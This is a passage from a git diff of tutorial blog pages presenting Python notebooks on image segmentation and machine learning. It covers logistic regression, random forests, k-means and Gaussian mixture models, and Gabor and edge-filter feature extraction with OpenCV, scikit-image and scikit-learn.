• STEP 3: DEAL WITH MISSING VALUES

df = df.dropna()
• STEP 4: CONVERT NON-NUMERIC TO NUMERIC

Replace Good and Bad with numeric labels that are easier for the model to work with.

df.Productivity[df.Productivity == 'Good'] = 1
df.Productivity[df.Productivity == 'Bad'] = 2
df.head()
            @@ -1096,13 +1094,13 @@
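As an aside, chained indexing like df.Productivity[...] = 1 triggers pandas' SettingWithCopyWarning on recent versions; the .loc form is the documented way to assign by condition (a sketch, equivalent to the cell above):

df.loc[df.Productivity == 'Good', 'Productivity'] = 1
df.loc[df.Productivity == 'Bad', 'Productivity'] = 2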

• STEP 5: PREPARE THE DATA (define indep/dep variables)

Y = df['Productivity'].values
Y = Y.astype('int')
Y
            array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
                    1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
                    1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
                    1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
             
X = df.drop(labels=['Productivity'], axis=1)
X.head()
            @@ -1148,7 +1146,7 @@

• STEP 6: SPLIT DATA

from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
X_train.head()
            @@ -1194,26 +1192,26 @@

• STEP 7: DEFINE THE MODEL

from sklearn.linear_model import LogisticRegression

model = LogisticRegression()
model.fit(X_train, y_train)
• STEP 8: TESTING THE MODEL

prediction_test = model.predict(X_test)
prediction_test
            array([2, 2, 2, 1, 1, 2, 1, 2])
             
• STEP 9: VERIFY THE ACCURACY

from sklearn import metrics

print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
            Accuracy = 0.75
             
• STEP 10: WEIGHTS

model.coef_
            array([[0.18788991, 0.19204588, 0.0200644 ]])
             
weights = pd.Series(model.coef_[0], index=X.columns.values)
weights
            Time      0.187890
             Coffee    0.192046
             Age       0.020064
            @@ -5251,6 +5249,8 @@ 

diff --git a/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html b/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html
index cdf74ae3a3..0280257257 100644
--- a/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html
+++ b/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html
@@ -44,8 +44,6 @@
@@ -403,7 +401,7 @@

DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning

import numpy as np
import matplotlib.pyplot as plt
import cv2

img = cv2.imread('images/BSE_Image.jpg')
plt.imshow(img)
          <matplotlib.image.AxesImage at 0x202a78459d0>
           

          png

• Reshape the image into a flat N x 3 array of pixels

img2 = img.reshape((-1, 3))
img2 = np.float32(img2)
• Now we apply the KMeans function. Before that we need to specify the termination criteria: stop the algorithm and return the answer once 10 iterations have run or an accuracy of epsilon = 1.0 is reached.

            @@ -518,7 +516,7 @@

criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
            • Clusters

              @@ -554,11 +552,11 @@

k = 3
attempts = 10
ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
center = np.uint8(center)
res = center[label.flatten()]
• Reshape the array back to the original image shape

res2 = res.reshape((img.shape))
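The notes stop at the reshape, but it only takes one more line to look at the result; a sketch (cvtColor is just to get RGB channel order for matplotlib):

plt.imshow(cv2.cvtColor(res2, cv2.COLOR_BGR2RGB))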
import numpy as np
import cv2

img = cv2.imread('images/plant_cells.jpg')
img2 = img.reshape((-1, 3))

from sklearn.mixture import GaussianMixture as GMM

gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
gmm_labels = gmm_model.predict(img2)
original_shape = img.shape
segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
• The image is segmented into two classes, 0 and 1

import matplotlib.pyplot as plt

plt.imshow(segmented, cmap='gray')
              <matplotlib.image.AxesImage at 0x1ee043bb4c0>
               

              png


import numpy as np
import cv2

img = cv2.imread('images/BSE_Image.jpg')
img2 = img.reshape((-1, 3))

from sklearn.mixture import GaussianMixture as GMM

# Segment into 4 classes
gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
gmm_labels = gmm_model.predict(img2)
original_shape = img.shape
segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

import matplotlib.pyplot as plt

plt.imshow(segmented, cmap='gray')
              <matplotlib.image.AxesImage at 0x1ee04598c10>
               

              png
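Choosing n_components by eye is fine for a demo; a more principled pick is the number of components minimizing the Bayesian Information Criterion. A sketch of mine, not from the tutorial (fitting on a random subsample of img2 to keep it fast):

import numpy as np
from sklearn.mixture import GaussianMixture

sample = img2[np.random.choice(img2.shape[0], 10000, replace=False)]
bics = [GaussianMixture(n_components=n, covariance_type='tied').fit(sample).bic(sample)
        for n in range(1, 7)]
print('Components minimizing BIC:', int(np.argmin(bics)) + 1)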

              @@ -647,7 +645,7 @@

from sklearn import mixture
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stats
              • Create some data

                @@ -662,13 +660,13 @@

# 1000 samples with mean 5, std 5, plus 1000 samples with mean 10, std 2
# (np.random.normal takes the standard deviation, not the variance)
# Concatenated: 2000 samples in total
x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
plt.plot(x)
                [<matplotlib.lines.Line2D at 0x1fc9d0cd7c0>]
                 

                png

plt.hist(x, bins=100)

                png

f = x.reshape(-1, 1)
• We created the data from two normal distributions, but for the fun of it let us decompose the data into 3 Gaussians (n_components=3)

g = mixture.GaussianMixture(n_components=3, covariance_type='full')
g.fit(f)
weights = g.weights_  # mixture weights
means = g.means_  # component means
covars = g.covariances_  # component covariances

x_axis = x
x_axis.sort()

plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
plt.plot(x_axis, weights[0]*stats.norm.pdf(x_axis, means[0], np.sqrt(covars[0])).ravel(), c='red')
plt.plot(x_axis, weights[1]*stats.norm.pdf(x_axis, means[1], np.sqrt(covars[1])).ravel(), c='green')
plt.plot(x_axis, weights[2]*stats.norm.pdf(x_axis, means[2], np.sqrt(covars[2])).ravel(), c='blue')

plt.grid()
plt.show()

                    png
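To check the fit against the generating distributions (mean 5 / std 5 and mean 10 / std 2), the recovered parameters can be printed directly; a quick sketch (the component order is arbitrary):

for k in range(3):
    # means_ has shape (3, 1) and covariances_ has shape (3, 1, 1) here
    print('component %d: weight = %.2f, mean = %.2f, std = %.2f'
          % (k, weights[k], means[k][0], np.sqrt(covars[k][0][0])))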


                    2D example

from sklearn.datasets import make_blobs
import numpy as np
from matplotlib import pyplot as plt
                    • Generate some data
X, y_true = make_blobs(n_samples=400, centers=4,
                       cluster_std=0.60, random_state=0)
X = X[:, ::-1]  # flip axes for better plotting

rng = np.random.RandomState(13)
X_stretched = np.dot(X, rng.randn(2, 2))
plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
                    <matplotlib.collections.PathCollection at 0x1fc9eac9310>
                     

                    png

from sklearn.mixture import GaussianMixture as GMM

gmm = GMM(n_components=4, covariance_type='full', random_state=42)

from matplotlib.patches import Ellipse


def draw_ellipse(position, covariance, ax=None, **kwargs):
    """
    Draw an ellipse with a given position and covariance
    """
    ax = ax or plt.gca()

    # Convert covariance to principal axes
    if covariance.shape == (2, 2):
        U, s, Vt = np.linalg.svd(covariance)
        angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
        width, height = 2 * np.sqrt(s)
    else:
        angle = 0
        width, height = 2 * np.sqrt(covariance)

    # Draw the ellipse at 1, 2 and 3 sigma
    for nsig in range(1, 4):
        ax.add_patch(Ellipse(position, nsig * width, nsig * height,
                             angle, **kwargs))


def plot_gmm(gmm, X, label=True, ax=None):
    ax = ax or plt.gca()
    labels = gmm.fit(X).predict(X)
    if label:
        ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
    else:
        ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
    ax.axis('equal')

    w_factor = 0.2 / gmm.weights_.max()
    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
        draw_ellipse(pos, covar, alpha=w * w_factor)

plot_gmm(gmm, X_stretched)

                    png


                    3D

import numpy as np
from sklearn.mixture import GaussianMixture
from matplotlib import pyplot as plt
• Generate 3D data with 4 clusters: set the Gaussian centers and covariances in 3D

means = np.array([[0.5, 0.0, 0.0],
                  [0.0, 0.0, 0.0],
                  [-0.5, -0.5, -0.5],
                  [-0.8, 0.3, 0.4]])

covs = np.array([np.diag([0.01, 0.01, 0.03]),
                 np.diag([0.08, 0.01, 0.01]),
                 np.diag([0.01, 0.05, 0.01]),
                 np.diag([0.03, 0.07, 0.01])])

n_gaussians = means.shape[0]  # Number of clusters

N = 1000  # Number of points to be generated for each cluster
points = []
for i in range(len(means)):
    x = np.random.multivariate_normal(means[i], covs[i], N)
    points.append(x)
points = np.concatenate(points)
                        • Plot
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
ax.view_init(35.246, 45)
plt.show()

                        png

• Fit the Gaussian model
gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
gmm.fit(points)
• Functions to visualize the data
import matplotlib.cm as cmx


def plot_sphere(w=0, c=[0, 0, 0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
    '''
    Plot a sphere surface
    Input:
        c: 3-element list, sphere center
        r: 3-element list, sphere original scale in each axis (allowing to draw ellipsoids)
        subdev: scalar, number of subdivisions (subdev^2 points sampled on the surface)
        ax: optional pyplot axis object to plot the sphere in
        sigma_multiplier: sphere additional scale (choosing an std value when plotting gaussians)
    Output:
        ax: pyplot axis object
    '''
    if ax is None:
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
    pi = np.pi
    cos = np.cos
    sin = np.sin
    phi, theta = np.mgrid[0.0:pi:complex(0, subdev), 0.0:2.0 * pi:complex(0, subdev)]
    x = sigma_multiplier * r[0] * sin(phi) * cos(theta) + c[0]
    y = sigma_multiplier * r[1] * sin(phi) * sin(theta) + c[1]
    z = sigma_multiplier * r[2] * cos(phi) + c[2]
    cmap = cmx.ScalarMappable()
    cmap.set_cmap('jet')
    c = cmap.to_rgba(w)

    ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

    return ax


def visualize_3d_gmm(points, w, mu, stdev):
    '''
    Plots points and their corresponding GMM model in 3D
    Input:
        points: N x 3, sampled points
        w: n_gaussians, gmm weights
        mu: 3 x n_gaussians, gmm means
        stdev: 3 x n_gaussians, gmm standard deviation (assuming diagonal covariance matrix)
    Output:
        None
    '''
    n_gaussians = mu.shape[1]
    N = int(np.round(points.shape[0] / n_gaussians))
    # Visualize data
    fig = plt.figure(figsize=(8, 8))
    axes = fig.add_subplot(111, projection='3d')
    axes.set_xlim([-1, 1])
    axes.set_ylim([-1, 1])
    axes.set_zlim([-1, 1])
    plt.set_cmap('Set1')
    colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
    for i in range(n_gaussians):
        idx = range(i * N, (i + 1) * N)
        axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
        plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

    plt.title('3D GMM')
    axes.set_xlabel('X')
    axes.set_ylabel('Y')
    axes.set_zlabel('Z')
    axes.view_init(35.246, 45)
    plt.show()

visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)

                        png
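Because the data came from known centers, a quick sanity check is to compare the fitted means with the `means` array defined above (a sketch; the fitted components come back in arbitrary order):

print('fitted means:\n', np.round(gmm.means_, 2))
print('true means:\n', means)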

                        53 - How to pick optimal number of parameters for your unsupervised machine learning model

import numpy as np
import cv2
from matplotlib import pyplot as plt

img = cv2.imread('images/alloy.jpg')
img2 = img.reshape((-1, 3))
plt.imshow(img)
                        <matplotlib.image.AxesImage at 0x2650b465fd0>
                         

                        png

from sklearn.mixture import GaussianMixture as GMM

n_components = np.arange(1, 10)
gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]

plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
plt.xlabel('n_components')
                        Text(0.5, 0, 'n_components')
                         

                        png
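A simple heuristic (a sketch) is to take the component count at the BIC minimum, or to look for the elbow where the curve flattens; AIC can be plotted alongside for comparison:

bic = [m.bic(img2) for m in gmm_models]
aic = [m.aic(img2) for m in gmm_models]
print('n_components at minimum BIC:', n_components[np.argmin(bic)])

plt.plot(n_components, bic, label='BIC')
plt.plot(n_components, aic, label='AIC')
plt.xlabel('n_components')
plt.legend()
plt.show()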


                        57 - How to generate features in Python for machine learning

import matplotlib.pyplot as plt
import cv2

img = cv2.imread('images/scratch.jpg', 0)
plt.imshow(img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x181098b9220>
                         

                        png


from skimage.filters.rank import entropy
from skimage.morphology import disk

entropy_img = entropy(img, disk(1))
plt.imshow(entropy_img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x1810981b2e0>
                         

                        png
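The disk radius sets the neighborhood over which the local entropy is computed: larger disks smooth out fine texture. A quick sketch comparing two radii (the values 1 and 5 are chosen only for illustration):

fig, axes = plt.subplots(1, 2, figsize=(10, 5))
for ax, r in zip(axes, (1, 5)):
    ax.imshow(entropy(img, disk(r)), cmap='gray')
    ax.set_title('disk(%d)' % r)
plt.show()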


import matplotlib.pyplot as plt
import cv2
from skimage.filters.rank import entropy
from skimage.morphology import disk

img = cv2.imread('images/Yeast_Cells.png', 0)
entropy_img = entropy(img, disk(1))

fig = plt.figure(figsize=(10, 10))

ax1 = fig.add_subplot(121)
ax1.imshow(img, cmap='gray')
ax1.title.set_text('img')

ax2 = fig.add_subplot(122)
ax2.imshow(entropy_img, cmap='gray')
ax2.title.set_text('entropy_img')
plt.show()

                        png


• Using the Sobel filter
import matplotlib.pyplot as plt
import cv2
from skimage.filters.rank import entropy
from skimage.morphology import disk

img = cv2.imread('images/Yeast_Cells.png', 0)
entropy_img = entropy(img, disk(1))

from scipy import ndimage as nd

gaussian_img = nd.gaussian_filter(img, sigma=3)

from skimage.filters import sobel

sobel_img = sobel(img)

fig = plt.figure(figsize=(10, 10))

ax1 = fig.add_subplot(131)
ax1.imshow(img, cmap='gray')
ax1.title.set_text('img')

ax2 = fig.add_subplot(132)
ax2.imshow(gaussian_img, cmap='gray')
ax2.title.set_text('gaussian_img')

ax3 = fig.add_subplot(133)
ax3.imshow(sobel_img, cmap='gray')
ax3.title.set_text('sobel_img')

plt.show()

                        png


• Using Pandas to collect the feature statistics for machine learning
import matplotlib.pyplot as plt
import cv2
from skimage.filters.rank import entropy
from skimage.morphology import disk
from scipy import ndimage as nd
from skimage.filters import sobel
import pandas as pd

img = cv2.imread('images/Yeast_Cells.png', 0)
img2 = img.reshape(-1)

df = pd.DataFrame()
df['Original Pixel Values'] = img2

entropy_img = entropy(img, disk(1))
entropy1 = entropy_img.reshape(-1)
df['Entropy'] = entropy1

gaussian_img = nd.gaussian_filter(img, sigma=3)
gaussian1 = gaussian_img.reshape(-1)
df['Gaussian'] = gaussian1

sobel_img = sobel(img)
sobel1 = sobel_img.reshape(-1)
df['Sobel'] = sobel1

df

# kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)

import numpy as np
import cv2
import matplotlib.pyplot as plt

ksize = 5
sigma = 3
theta = 1 * np.pi / 4
lamda = 1 * np.pi / 4
gamma = 0.5
phi = 0

kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
plt.imshow(kernel, cmap='gray')
                        <matplotlib.image.AxesImage at 0x2021c8e8d90>
                         

                        png
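To see the orientation selectivity of the Gabor kernel, here is a sketch that sweeps theta while keeping the other parameters from the cell above fixed:

fig, axes = plt.subplots(1, 4, figsize=(12, 3))
for ax, t in zip(axes, np.arange(4) * np.pi / 4):
    k = cv2.getGaborKernel((ksize, ksize), sigma, t, lamda, gamma, phi, ktype=cv2.CV_32F)
    ax.imshow(k, cmap='gray')
    ax.set_title('theta = %.2f' % t)
plt.show()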

img = cv2.imread('images/synthetic.jpg', 0)
plt.imshow(img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x2021c966fd0>
                         

                        png


OpenCV image convolution: the cv.filter2D() function explained

fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(fimg, cmap='gray')
                      <matplotlib.image.AxesImage at 0x2021c9bec40>
                       

                      png


By changing the value of $\theta$, the Gabor filter can be made to pick up the diagonal lines running toward the lower right.

import numpy as np
import cv2
import matplotlib.pyplot as plt

ksize = 5
sigma = 3
theta = 3 * np.pi / 4
lamda = 1 * np.pi / 4
gamma = 0.5
phi = 0

kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
plt.imshow(fimg, cmap='gray')
                      <matplotlib.image.AxesImage at 0x2021c697b20>
                       

                      png


                      60 - How to use Random Forest in Python

import pandas as pd
import matplotlib.pyplot as plt
import numpy as np

df = pd.read_csv('data/images_analyzed_productivity1.csv')
df.head()

sizes = df['Productivity'].value_counts(sort=1)
sizes
                      Bad     42
                       Good    38
                       Name: Productivity, dtype: int64
                       

Drop the irrelevant columns

df.drop(['Images_Analyzed'], axis=1, inplace=True)
df.drop(['User'], axis=1, inplace=True)
df.head()

df = df.dropna()

Convert the labels to numbers

# (df.loc[mask, 'Productivity'] = ... would avoid pandas' SettingWithCopyWarning)
df.Productivity[df.Productivity == 'Good'] = 1
df.Productivity[df.Productivity == 'Bad'] = 2
df.head()

Y = df['Productivity'].values
Y = Y.astype('int')
Y
                      array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
                              1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
                              1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
                              1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
                       

Define the independent variables (features)

X = df.drop(labels=['Productivity'], axis=1)

Split the data into training and test sets

from sklearn.model_selection import train_test_split

X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

Train a Random Forest

                      sklearn.ensemble.RandomForestClassifier

from sklearn.ensemble import RandomForestClassifier

model = RandomForestClassifier(n_estimators=10, random_state=30)
model.fit(X_train, Y_train)
prediction_test = model.predict(X_test)
prediction_test
                      array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,
                              1, 1, 2, 1, 1, 2, 1, 1, 1, 1])
                       

Compute the accuracy of the trained model

from sklearn import metrics

print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9375
                       

Increasing the proportion of data used for training can improve accuracy (here the score happens to stay at 0.9375).

X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
model = RandomForestClassifier(n_estimators=10, random_state=30)
model.fit(X_train, Y_train)
prediction_test = model.predict(X_test)
print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9375
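Beyond a single accuracy number, a confusion matrix shows which class is being misclassified; a minimal sketch reusing the same test split:

from sklearn.metrics import confusion_matrix

# Rows are the true classes (1 = Good, 2 = Bad), columns the predictions.
print(confusion_matrix(Y_test, prediction_test))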
                       

Show the feature importances

feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
feature_imp
                      Time      0.714433
                       Coffee    0.205474
                       Age       0.080092
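The same Series can be plotted directly as a bar chart; a quick sketch:

feature_imp.plot.bar()
plt.ylabel('importance')
plt.show()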

Random forest visualization in Python (CSDN blog)

from IPython.display import HTML, display
from sklearn import tree
import pydotplus

estimators = model.estimators_
for m in estimators:
    dot_data = tree.export_graphviz(m, out_file=None,
                                    feature_names=['Time', 'Coffee', 'Age'],
                                    class_names=['Good', 'Bad'],
                                    filled=True, rounded=True,
                                    special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    # Render inline in an IPython / Jupyter notebook
    svg = graph.create_svg()
    if hasattr(svg, "decode"):
        svg = svg.decode("utf-8")
    html = HTML(svg)
    display(html)

                      svg
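If graphviz/pydotplus is not available, sklearn's built-in plot_tree gives a dependency-free alternative; a sketch rendering just the first tree of the forest:

from sklearn import tree

plt.figure(figsize=(12, 8))
tree.plot_tree(model.estimators_[0],
               feature_names=['Time', 'Coffee', 'Age'],
               class_names=['Good', 'Bad'],
               filled=True, rounded=True)
plt.show()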

                      61 - How to create Gabor feature banks for machine learning

import numpy as np
import cv2
import matplotlib.pyplot as plt
import pandas as pd

img = cv2.imread('images/synthetic.jpg', 0)

df = pd.DataFrame()
img2 = img.reshape(-1)
df['Original Pixels'] = img2
df

num = 1
for sigma in (3, 5):
    for theta in range(2):
        theta = theta / 4. * np.pi
        for lamda in np.arange(0, np.pi, np.pi / 4.):
            for gamma in (0.05, 0.5):
                gabor_label = 'Gabor ' + str(num)
                kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img
                num += 1

df.head()

df.to_csv('Gabor.csv')

                      png

                      62 - Image Segmentation using traditional machine learning - The plan

A brief overview of what the next few videos will cover.

63 - Image Segmentation using traditional machine learning Part 1 - Feature Extraction

import numpy as np
import cv2
import pandas as pd
import matplotlib.pyplot as plt

img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
plt.imshow(img, cmap='gray')
                      <matplotlib.image.AxesImage at 0x17d0c13f730>
                       

                      png

df = pd.DataFrame()
                      • Add original pixel values to the data frame as feature #1
img2 = img.reshape(-1)
df['Original Image'] = img2
df.head()

# Generate Gabor features
num = 1  # To count numbers up in order to give Gabor features a label in the data frame
kernels = []
for theta in range(2):  # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3):  # Sigma with 1 and 3
        for lamda in np.arange(0, np.pi, np.pi / 4):  # Range of wavelengths
            for gamma in (0.05, 0.5):  # Gamma values of 0.05 and 0.5
                gabor_label = 'Gabor' + str(num)  # Label Gabor columns as Gabor1, Gabor2, etc.
                ksize = 9
                kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                kernels.append(kernel)
                # Now filter the image and add values to a new column
                fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img  # Labels columns as Gabor1, Gabor2, etc.
                print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
                num += 1  # Increment for gabor column label
                      Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05
                       Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5
                       Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05
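Before trusting all 32 columns, it is worth eyeballing a few kernels; in particular, the lamda = 0 combinations are arguably degenerate (the wavelength term divides by zero), so those columns carry little signal. A quick look at one kernel (a sketch reusing the kernels list built above; the index is arbitrary):

plt.imshow(kernels[4], cmap='gray')  # pick any kernel from the bank
plt.title('One kernel from the Gabor bank')
plt.show()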

                      edges = cv2.Canny(img, 100, 200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1
                      • ROBERTS EDGE
                      from skimage.filters import roberts, sobel, scharr, prewitt

                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1
                      • SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1
                      • SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1
                      • PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1
                      • GAUSSIAN with sigma = 3
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1
                      • GAUSSIAN with sigma = 7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3
• MEDIAN with size = 3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1
                      • VARIANCE with size = 3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe
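The same pattern extends to any other local texture measure. For example, local entropy from skimage is a common extra feature (a sketch; the 'Entropy s3' column name and the disk radius are my choices, not from the video):

from skimage.filters.rank import entropy
from skimage.morphology import disk

entropy_img = entropy(img, disk(3))  # local entropy in a radius-3 neighbourhood
df['Entropy s3'] = entropy_img.reshape(-1)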

                      df.head()

                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Label'] = labeled_img1

                      64 - Image Segmentation using traditional machine learning - Part2 Training RF

                      • Dependent variable
                      Y = df['Label'].values
                      X = df.drop(labels=['Label'], axis=1)
                      • Split data into test and train
                      from sklearn.model_selection import train_test_split

                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      • Import ML algorithm and train the model
                      from sklearn.ensemble import RandomForestClassifier

                      model = RandomForestClassifier(n_estimators=10, random_state=42)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      from sklearn import metrics

                      print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9812850216441728
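A single accuracy number can hide weak minority classes, so a per-class breakdown is a cheap extra check (a sketch using sklearn's classification_report with the variables above):

from sklearn.metrics import classification_report

# Precision, recall and F1 per label value, not just overall accuracy
print(classification_report(Y_test, prediction_test))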
                       

                      65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

fig = plt.figure(figsize=(12, 16))
p = 1
for index, feature in enumerate(df.columns):
    if index == 0:
        p += 1
        ax = fig.add_subplot(181)
        plt.xticks([])
        plt.yticks([])
        ax.imshow(img, cmap='gray')
        ax.title.set_text(feature)
    else:
        if p % 8 == 1:
            p += 1
        exec("ax" + str(index) + " = fig.add_subplot(6, 8, " + str(p) + ")")
        plt.xticks([])
        plt.yticks([])
        exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
        exec("ax" + str(index) + ".title.set_text('" + feature + "')")
        p += 1
plt.show()

                      png

                      importances = list(model.feature_importances_)
                      features_list = list(X.columns)
                      feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
                      feature_imp
                      Gabor4            0.248493
                       Gaussian s3       0.168623
                       Median s3         0.122685
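Since feature_imp is already a sorted pandas Series, charting the ranking is a one-liner (a sketch):

feature_imp.plot.bar(figsize=(12, 4))
plt.ylabel('Feature importance')
plt.show()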

                      66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

                      import pickle

                      filename = 'sandstone_model'
                      pickle.dump(model, open(filename, 'wb'))

                      load_model = pickle.load(open(filename, 'rb'))
                      result = load_model.predict(X)

                      segmented = result.reshape((img.shape))
                      import matplotlib.pyplot as plt

                      plt.imshow(segmented, cmap='jet')
                      <matplotlib.image.AxesImage at 0x17d37062220>
                       

                      png

                      plt.imsave('segmented_rock.jpg', segmented, cmap='jet')
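As an aside, scikit-learn's persistence docs suggest joblib over plain pickle for models holding large NumPy arrays, such as random forests; the usage mirrors pickle (a sketch; the .joblib filename is my choice):

import joblib

joblib.dump(model, 'sandstone_model.joblib')    # save
model2 = joblib.load('sandstone_model.joblib')  # load back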

                      67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

import numpy as np
import cv2
import pandas as pd

def feature_extraction(img):
    df = pd.DataFrame()

    # All features generated must match the way features are generated for TRAINING.
    # Feature 1 is our original image pixels
    img2 = img.reshape(-1)
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
        theta = theta / 4. * np.pi
        for sigma in (1, 3):
            for lamda in np.arange(0, np.pi, np.pi / 4):
                for gamma in (0.05, 0.5):
                    gabor_label = 'Gabor' + str(num)
                    ksize = 9
                    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                    kernels.append(kernel)
                    # Now filter image and add values to new column
                    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                    filtered_img = fimg.reshape(-1)
                    df[gabor_label] = filtered_img  # Adds a new column for each Gabor filter
                    num += 1
    ########################################
    # Generate OTHER FEATURES and add them to the data frame
    # Feature 3 is Canny edge
    edges = cv2.Canny(img, 100, 200)  # Image, min and max values
